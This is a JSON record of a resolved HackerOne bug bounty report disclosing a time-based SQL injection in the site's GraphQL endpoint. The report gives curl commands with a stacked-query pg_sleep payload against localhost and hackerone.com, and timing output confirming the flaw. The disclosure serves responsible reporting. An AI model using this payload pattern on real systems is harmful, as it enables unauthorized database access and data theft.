{"id": "H1:435066", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "HackerOne: SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter", "description": "The `embedded_submission_form_uuid` parameter in the `/graphql` endpoint is vulnerable to a SQL injection. Execute the following command to reproduce the behavior:\n\n**Locally**:\n```\ncurl -X POST http://localhost:8080/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\\(30\\)%3B--%27\n```\n\n**HackerOne.com**\n```\ncurl -X POST https://hackerone.com/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\\(30\\)%3B--%27\n```\n\n**Additional proof**\n```\n$ time curl -X POST https://hackerone.com/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\\(5\\)%3B--%27\n{}curl -X POST 0.03s user 0.01s system 0% cpu 5.726 total\n$ time curl -X POST https://hackerone.com/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\\(1\\)%3B--%27\n{}curl -X POST 0.03s user 0.01s system 2% cpu 1.631 total\n$ time curl -X POST https://hackerone.com/graphql\\?embedded_submission_form_uuid\\=1%27%3BSELECT%201%3BSELECT%20pg_sleep\\(10\\)%3B--%27\n{}curl -X POST 0.02s user 0.01s system 0% cpu 10.557 total\n```\n\n## Impact\n\nThe SQL injection seems to be executing in the context of the `secure` schema, so impact is currently unknown. However, since an attacker may be able to switch schemas, we should consider this to have a high impact on confidentiality.", "published": "2018-11-06T16:52:08", "modified": "2018-11-30T01:26:39", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://hackerone.com/reports/435066", "reporter": "jobert", "references": [], "cvelist": [], "lastseen": "2018-11-30T05:06:05", "viewCount": 672, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2018-11-30T05:06:05", "rev": 2}, "dependencies": {"references": [], "modified": "2018-11-30T05:06:05", "rev": 2}, "vulnersScore": 0.3}, "bounty": 0.0, "bountyState": "resolved", "h1team": {"handle": "security", "profile_picture_urls": {"medium": "https://profile-photos.hackerone-user-content.com/000/000/013/28af2ada2cc00aa9427504fc5a14f587362df84b_medium.png?1445331713", "small": "https://profile-photos.hackerone-user-content.com/000/000/013/68fea1fe00dc833f4109e015738af4b374727e56_small.png?1445331713"}, "url": "https://hackerone.com/security"}, "h1reporter": {"disabled": false, "hacker_mediation": false, "hackerone_triager": false, "is_me?": false, "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/002/15c798072d48f06507cde4b11352a3338ae973fc_small.png?1410255083"}, "url": "/jobert", "username": "jobert"}}